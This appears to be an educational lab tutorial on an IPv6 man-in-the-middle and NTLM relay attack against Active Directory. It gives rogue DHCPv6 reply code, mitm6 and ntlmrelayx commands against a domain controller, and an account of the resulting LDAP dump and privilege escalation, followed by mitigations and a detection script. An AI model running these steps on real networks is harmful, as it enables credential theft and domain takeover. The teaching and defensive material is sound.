IPv6 attacks in Active Directory exploit a critical oversight in many enterprise networks: IPv6 is enabled by default on Windows systems but rarely configured or monitored. This creates a hidden attack surface that adversaries can abuse to perform Man-in-the-Middle (MITM) attacks, capture credentials and escalate privileges.
- Attacker connects a rogue IPv6 router and sends Router Advertisements (RA).
- Windows hosts auto-configure via SLAAC and trust the new default gateway.
- Host learns DNS via RDNSS in RA and/or DHCPv6 (rogue DNS accepted).
- Traffic now routes through the attacker-controlled gateway.
- Attacker performs MITM (traffic redirection, DNS poisoning).
- Outcomes: credential theft, session hijacking and data interception, all of which are especially easy where IPv6 is unmanaged or unmonitored.
Note: This demonstration is intended for educational purposes only, within a controlled lab environment or with explicit authorization. Unauthorized use of these techniques is illegal and unethical.
Workflow of the IPv6 Attack
In this attack, we will use the mitm6 tool to perform the MITM step and, as in our previous SMB attack, the ntlmrelayx tool to relay the captured authentication. Below is the workflow of the attack:
- mitm6 listens for the DHCPv6 Solicit/Request messages that Windows clients send to the multicast address ff02::1:2 at boot and at regular intervals (IPv6 is enabled by default, so every Windows host does this). It answers them, assigning the client an IPv6 address and, crucially, naming the attacker as the client's DNS server. Unlike the rogue-router scenario above, no Router Advertisement is needed for this step.
- Windows queries the IPv6 DNS server it was handed before its IPv4 one, so internal name lookups, including the WPAD (proxy auto-discovery) lookup, now reach the attacker, who answers with its own address. The client then tries to fetch the proxy configuration file and authenticates to the attacker's fake proxy with NTLM.
- ntlmrelayx.py receives that NTLM authentication.
- Instead of cracking it, the tool relays it to a legitimate AD service (LDAP on the domain controller here; SMB is also possible where signing is not enforced).
- If the relay succeeds, the attacker acts as the relayed user: dumping domain information over LDAP and, if that user is privileged, creating accounts or granting rights.
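To make the first step concrete, here is a minimal model of the DHCPv6 exchange that mitm6 exploits: a client Solicit, and a rogue Advertise/Reply that hands back an address together with the attacker as DNS server (option 23) and the domain search list (option 24). This is an added example written for this page, not mitm6's own code; the DUIDs, MAC addresses, the lease fe80::1:2, the attacker address fe80::1 and the transaction ID are constructed, and real DHCPv6 details such as relay agents, status codes and rapid commit are left out.

```python
import struct
import ipaddress

# DHCPv6 message types and option codes (RFC 8415)
SOLICIT, ADVERTISE, REQUEST, REPLY = 1, 2, 3, 7
OPT_CLIENTID, OPT_SERVERID, OPT_IA_NA, OPT_IAADDR = 1, 2, 3, 5
OPT_ORO, OPT_ELAPSED, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 6, 8, 23, 24

# Constructed DUID-LL identifiers (type 3, hardware type 1 = Ethernet, fake MACs)
CLIENT_DUID = struct.pack("!HH", 3, 1) + bytes.fromhex("080027aabbcc")
ATTACKER_DUID = struct.pack("!HH", 3, 1) + bytes.fromhex("080027ddeeff")
ATTACKER_LL = "fe80::1"   # attacker link-local, handed out as the DNS server (assumed)

def build_option(code, payload):
    return struct.pack("!HH", code, len(payload)) + payload

def parse_options(data):
    """Split the option area into (code, payload) pairs."""
    opts = []
    while len(data) >= 4:
        code, length = struct.unpack("!HH", data[:4])
        opts.append((code, data[4:4 + length]))
        data = data[4 + length:]
    return opts

def parse_message(raw):
    # msg-type (1 byte), transaction-id (3 bytes), then options
    return raw[0], raw[1:4], parse_options(raw[4:])

def encode_domain(name):
    """DNS wire format: length-prefixed labels, terminated by a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"

def decode_domains(data):
    names, i = [], 0
    while i < len(data):
        labels = []
        while data[i] != 0:
            n = data[i]
            labels.append(data[i + 1:i + 1 + n].decode("ascii"))
            i += 1 + n
        i += 1
        names.append(".".join(labels))
    return names

def build_solicit(xid, client_duid, iaid):
    """Constructed client Solicit, like a Windows host sends at boot or lease renewal."""
    ia_na = struct.pack("!III", iaid, 0, 0)            # IAID, T1, T2
    return bytes([SOLICIT]) + xid + (
        build_option(OPT_CLIENTID, client_duid)
        + build_option(OPT_ELAPSED, b"\x00\x00")
        + build_option(OPT_IA_NA, ia_na)
        + build_option(OPT_ORO, struct.pack("!HH", OPT_DNS_SERVERS, OPT_DOMAIN_LIST))
    )

def rogue_reply(request_raw, server_duid, leased_addr, dns_addr, search_domain):
    """Answer a Solicit with Advertise and a Request with Reply, echoing the
    client's transaction ID and IAID so the client accepts the message."""
    msg_type, xid, opts = parse_message(request_raw)
    if msg_type not in (SOLICIT, REQUEST):
        return None
    client_id = next(p for c, p in opts if c == OPT_CLIENTID)
    iaid = struct.unpack("!I", next(p for c, p in opts if c == OPT_IA_NA)[:4])[0]
    # Short lifetimes keep the client coming back, which is what a rogue server wants
    iaaddr = ipaddress.IPv6Address(leased_addr).packed + struct.pack("!II", 300, 300)
    ia_na = struct.pack("!III", iaid, 150, 250) + build_option(OPT_IAADDR, iaaddr)
    reply_type = ADVERTISE if msg_type == SOLICIT else REPLY
    return bytes([reply_type]) + xid + (
        build_option(OPT_CLIENTID, client_id)
        + build_option(OPT_SERVERID, server_duid)
        + build_option(OPT_IA_NA, ia_na)
        + build_option(OPT_DNS_SERVERS, ipaddress.IPv6Address(dns_addr).packed)
        + build_option(OPT_DOMAIN_LIST, encode_domain(search_domain))
    )

def client_view(reply_raw):
    """What the client takes from the reply: the DNS servers and search list it will now use."""
    _, _, opts = parse_message(reply_raw)
    dns = [str(ipaddress.IPv6Address(p[i:i + 16]))
           for c, p in opts if c == OPT_DNS_SERVERS for i in range(0, len(p), 16)]
    domains = [d for c, p in opts if c == OPT_DOMAIN_LIST for d in decode_domains(p)]
    return {"dns": dns, "search": domains}

def demo():
    solicit = build_solicit(b"\x12\x34\x56", CLIENT_DUID, 0x0E000001)
    advertise = rogue_reply(solicit, ATTACKER_DUID, "fe80::1:2", ATTACKER_LL, "gfg.local")
    return client_view(advertise)

if __name__ == "__main__":
    print(demo())   # the client now resolves gfg.local names via the attacker
```

The only thing the rogue server needs from the client is the transaction ID, client DUID and IAID, all of which are in the Solicit in the clear; there is no authentication in the exchange, which is why a host that trusts any DHCPv6 answer on the link is exposed.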
Hands-On IPv6 Attack
Step 1: Open the Kali terminal and install the mitm6 tool using these commands.
System Update Command:
sudo apt update
Updates the package list to ensure the latest versions are available.
Install Required Dependencies Command:
sudo apt install pipx python3-venv -y
Installs pipx and Python virtual environment support, required for installing mitm6.
Configure pipx Environment Command:
pipx ensurepath
Ensures that pipx binaries are available in the system PATH (open a new terminal afterwards so the change takes effect).
Install mitm6 Tool Command:
pipx install git+https://github.com/dirkjanm/mitm6.git
Downloads and installs the mitm6 tool from its official GitHub repository.
Verify Installation Command:
mitm6 -h
Displays the help menu to confirm that mitm6 is installed correctly.
Step 2: Now, to start the attack, we run mitm6 so that it answers the clients' DHCPv6 requests.
- Starts the rogue DHCPv6 and DNS services and injects spoofed DNS responses for the given domain. It needs root because it listens on privileged ports and crafts raw packets.
sudo mitm6 -d GFG.local
Step 3: In a second terminal, start ntlmrelayx so that the NTLM authentications mitm6 provokes are relayed to the domain controller.
ntlmrelayx.py -6 -t ldap://10.0.2.15 -wh fwpad.gfg.local -l lootme
- -6: Also listen on IPv6 (the clients will reach the attacker over the address mitm6 handed out)
- -t: Target to relay to (LDAP on the Domain Controller)
- -wh: WPAD host. This hostname is what ntlmrelayx serves as the proxy in the WPAD file; it must not already exist in the domain's DNS, so that only the attacker's DNS answers for it and the client's proxy lookup ends up authenticating to the attacker
- -l: Output (loot) directory
Output:

- This can take a while, because the attack only progresses when a client sends a DHCPv6 request and a WPAD lookup. To speed it up, restart the Windows 10 machine (or disconnect and reconnect its network adapter), which triggers a fresh DHCPv6 Solicit.
- After a successful relay, a lootme folder appears on the attacker machine containing the domain data dumped over LDAP, in several formats (HTML, JSON and plain text).

- Let's open domain_users_by_groups.html in Firefox.

- You can view all the details about the Administrators, Domain Guests, Domain Admins and other groups. You can also see the SQL Service account in Enterprise Admins, together with its description.
- The dump is what ntlmrelayx does with an unprivileged user. If the relayed authentication belongs to an account with administrative rights on the domain, ntlmrelayx uses it to create a new user in the domain and give that user high privileges (for example, membership in a privileged group or replication rights), so the attacker keeps access even after the relayed session ends.
Mitigating IPv6 Attacks in Active Directory
- Control IPv6 Traffic: if IPv6 is not used on the internal network, block DHCPv6 and Router Advertisements on the hosts rather than disabling IPv6 entirely (which Microsoft does not recommend). Via Group Policy, set the Windows Firewall's predefined "Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-In / DHCPV6-Out)" and "Core Networking - Router Advertisement (ICMPv6-In)" rules to Block. mitm6 depends entirely on the client sending a DHCPv6 Solicit and accepting the answer.
- Disable WPAD (High Priority): WPAD is heavily abused in relay attacks. Turn off "Automatically detect settings" for proxy configuration via Group Policy and stop and disable the WinHTTP Web Proxy Auto-Discovery Service (WinHttpAutoProxySvc).
- Enforce LDAP Security: require LDAP signing ("Domain controller: LDAP server signing requirements" set to Require signing) and LDAP channel binding (LdapEnforceChannelBinding set to 2) on all domain controllers. A relayed NTLM session cannot produce the signing key, so relays to LDAP fail when signing is required, and channel binding stops relays to LDAPS. Enforce SMB signing for the same reason on the SMB side.
- Harden Privileged Accounts: add administrators to the Protected Users group, whose members cannot authenticate with NTLM at all, so their credentials cannot be relayed. Also set "Account is sensitive and cannot be delegated"; note that this flag protects against Kerberos delegation abuse, not against NTLM relay itself.
- Disable NTLM Where Possible: prefer Kerberos authentication and restrict NTLM via the "Network security: Restrict NTLM" Group Policy settings (audit first, since legacy applications often still depend on NTLM).
- Network-Level Protections: enable RA Guard and DHCPv6 Guard on switches that support them, and monitor IPv6 traffic instead of treating it as noise.
- Monitor and Detect: look for DHCPv6 Advertise/Reply messages from a host that is not a known DHCPv6 server (on a network with no DHCPv6 at all, any such message is suspect), DNS answers for wpad names, and spikes of NTLM authentications to domain controllers from a single source in a short window (Event ID 4624 with the NTLM authentication package). Tools: SIEM solutions, network IDS/IPS.
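The three detection signals in the last bullet can be checked with a few lines of logic. The following is an added example written for this page, not a product rule set; it runs over a constructed event log (the addresses, timestamps and event format are made up, and a real deployment would feed it from the sensor or SIEM in use) and flags a rogue DHCPv6 server, an answered WPAD lookup and an NTLM authentication burst.

```python
import csv
import io
from collections import defaultdict, deque

# Constructed event log (not a real capture) modelling the mitm6 + ntlmrelayx sequence.
# Client fe80::aaaa, attacker fe80::bbbb (IPv4 10.0.2.30), domain controller 10.0.2.15.
# Fields: ts (epoch seconds), src, dst, kind, detail
SAMPLE_LOG = """ts,src,dst,kind,detail
1000,fe80::aaaa,ff02::1:2,dhcpv6_solicit,
1001,fe80::bbbb,fe80::aaaa,dhcpv6_advertise,dns=fe80::bbbb
1002,fe80::aaaa,ff02::1:2,dhcpv6_request,
1003,fe80::bbbb,fe80::aaaa,dhcpv6_reply,dns=fe80::bbbb
1010,fe80::aaaa,fe80::bbbb,dns_query,wpad.gfg.local
1010,fe80::bbbb,fe80::aaaa,dns_answer,wpad.gfg.local=fe80::bbbb
1011,fe80::aaaa,fe80::bbbb,dns_query,fwpad.gfg.local
1011,fe80::bbbb,fe80::aaaa,dns_answer,fwpad.gfg.local=fe80::bbbb
1020,10.0.2.30,10.0.2.15,ntlm_auth,ldap user=alice
1021,10.0.2.30,10.0.2.15,ntlm_auth,ldap user=alice
1022,10.0.2.30,10.0.2.15,ntlm_auth,ldap user=alice
1023,10.0.2.30,10.0.2.15,ntlm_auth,ldap user=alice
1024,10.0.2.30,10.0.2.15,ntlm_auth,ldap user=alice
1025,10.0.2.30,10.0.2.15,ntlm_auth,ldap user=alice
1500,10.0.2.21,10.0.2.15,ntlm_auth,smb user=bob
"""

def parse_events(log_text):
    """Read the CSV log into dicts with an integer timestamp."""
    rows = list(csv.DictReader(io.StringIO(log_text)))
    for r in rows:
        r["ts"] = int(r["ts"])
    return rows

def detect(log_text, approved_dhcpv6=frozenset(), ntlm_threshold=5, window=60):
    """Return (rule, source, detail) alerts for the three IPv6-relay signals."""
    alerts = []
    ntlm_times = defaultdict(deque)        # (src, dst) -> timestamps inside the window
    for e in parse_events(log_text):
        kind, src, detail = e["kind"], e["src"], e["detail"]
        # Rule 1: DHCPv6 server traffic from a host that is not an approved server.
        # With no DHCPv6 deployed (the empty default), every Advertise/Reply is rogue.
        if kind in ("dhcpv6_advertise", "dhcpv6_reply") and src not in approved_dhcpv6:
            alerts.append(("rogue_dhcpv6_server", src, detail))
        # Rule 2: a positive answer for a wpad name. With WPAD disabled and no such
        # record, only a spoofing resolver answers this lookup.
        elif kind == "dns_answer" and detail.lower().startswith("wpad."):
            alerts.append(("wpad_answered", src, detail))
        # Rule 3: NTLM burst from one source to one target inside a sliding window,
        # which is what a relay tool hammering the DC looks like. Fires once per burst.
        elif kind == "ntlm_auth":
            times = ntlm_times[(src, e["dst"])]
            times.append(e["ts"])
            while times and times[0] < e["ts"] - window:
                times.popleft()
            if len(times) == ntlm_threshold:
                alerts.append(("ntlm_auth_spike", src,
                               f"{len(times)} NTLM auths to {e['dst']} within {window}s"))
    return alerts

if __name__ == "__main__":
    for rule, src, detail in detect(SAMPLE_LOG):
        print(f"{rule:20} {src:12} {detail}")
```

Note that the second DNS answer (for the fwpad host used with -wh) is deliberately not matched by rule 2: the name the attacker chooses is arbitrary, so the robust signal is the wpad lookup itself plus the rogue DHCPv6 server that made the client ask the attacker in the first place. Passing the addresses of legitimate DHCPv6 servers in approved_dhcpv6 keeps rule 1 quiet on networks that do run DHCPv6.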